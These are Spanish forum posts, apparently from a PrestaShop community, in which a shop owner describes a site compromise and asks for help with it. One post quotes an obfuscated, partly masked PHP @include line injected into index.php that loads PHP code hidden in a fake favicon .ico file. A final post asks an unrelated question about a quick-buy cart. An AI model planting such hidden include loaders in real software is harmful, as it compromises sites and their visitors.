alex_aic

Al final no me quedó más remedio que: Limpiar manualmente todos los archivos, descargando todo el proyecto a local y buscando cadenas de texto en todo el proyecto Una vez limpio, resubirlo al sitio pero no sin antes cambiar las claves de base de datos, ftp y dashboard En principio actualmente está todo limpio, hemos contratado un servicio de siteLocker para que nos haga una auditoria durante este mes para verificar que todo anda ok y por el momento funciona todo bien Una faena interesante. La instalación era toda "default", sin theme, sin plugins excepto el de la pasarela de pagos que nos lo facilitó el banco, y en fin... Hemos tenido mala suerte. Copias de seguridad muy recomendables. (En casa del herrero,...)

Os adjunto el fichero favicon_3F7C7C.ico que al cambiarle la extensión a PHP resulta ser un script. favicon_3f7c7c.php

Os adjunto el resultado de desencriptar el include. Apuntaba a ese fichero .ico

Buenas, Tengo Prestashop actualizado, no poseemos plugins excepto los propios que vienen con Prestashop y el theme es el que viene por defecto. Desde finales del año pasado fue cuando empezamos a detectar esta historia. La instalación de ambos CMS la llevamos arrastrando desde 2014 con actualizaciones incluídas y sin problemas como os comentaba desde hace unos meses. Limpiamos manualmente los includes y poco después vuelven a aparecer, incluso llegando a desencriptar la cadena del include, apuntaba a un fichero .ico que en realidad contenía código y limpiamos el directorio y eliminamos todos los ficheros .ico sospechosos. A los días, otra vez. Así que sí, seguramente lo tendremos como comentas hasta en la cocina. Imagino que tendríamos que modificar claves de acceso FTP, realizar una instalación en limpio, pero claro, los ficheros como fotos o adjuntos podríamos volver a subirlos? Los antivirus convencionales no detectan nada ya que son script PHP con @include o similar y no van a detectar nada malo. Por otra parte, la base de datos se podría rescatar? ¿Qué tablas tendríamos que revisar? Tendríamos que conservar histórico de pedidos, pedidos en curso (carritos) y demás, artículos,... Más que nada para no tener que iniciar todo desde cero.

Desde hace un tiempo a esta parte, nos encontramos con que tanto Wordpress como Prestashop, en la tienda de un cliente realiza redirecciones publicitarias ajenas a su empresa. Dichas redirecciones son aleatorias y las puedes encontrar en el fuente con un código similar a este: index.php (prestashop) /*dd2f1*/ @include "\x2fh\x6fm\***/\****\x77m\x78d\x70c\x2fp\****\x6ci\x63_\****\x6dl\x2ft\x69e\****\x61/\x6do\x64u\****\x73/\x62l\x6fc\****\x79a\x63c\x6fu\x6et\x66o\x6ft\x65r\x2ff\x61v\x69c\x6fn\x5f3\x667\x637\x63.\x69c\x6f"; /*dd2f1*/ Una vez limpias los ficheros que contienen dicha cadena, al cabo del tiempo vuelve a aparecer. Hemos cambiado incluso de hosting, con claves y usuarios nuevos tanto en base de datos como FTP pero sigue sucediendo. ¿Alguna idea? He editado el contenido del include, porque al desencriptarlo me ha sacado una ruta desde el raíz hasta un fichero .ico que os comento en una respuesta próxima.

Muchísimas gracias. Con eso me basta por ahora.

Buenos días: Me encuentro con la peculiaridad, de que cuando selecciono un artículo en compra rápida (1.jpg) automáticamente me introduce en el carrito de la compra la primera combinación posible de dicho artículo (2.jpg) y como podemos observar en la vista del carrito, me ha seleccionado el color negro y el número 33 (3.jpg). --- --- No me deja seleccionar en la compra rápida el número, color,... u otras opciones de personalización o simplemente una combinación diferente dando lugar a posibles equivocaciones por los clientes. Es una tienda de zapatos online, a una persona le gusta uno de los modelos y le da a añadir y claro, si gasta un 38 por ejemplo, el botón del listado (1.jpg) le añadiría como en el ejemplo el 33. ¿Hay alguna forma de poder forzar una selección del artículo si éste tiene combinaciones? O por el contrario me tocaría cambiar el código del botón para que le redirija a la ficha del artículo. ¿Qué me aconsejáis hacer? Y ¿entendéis esto como un error? Porque yo creo que es un punto a tener muy en cuenta por los desarrolladores de la comunidad, ya que puede llevar a confusión. También os comento que llevo poco tiempo en la familia de PrestaShop y desconozco si hay solución a mis inquietudes, pero es que no sé cómo buscar una para mi problema. Muchas gracias de antemano.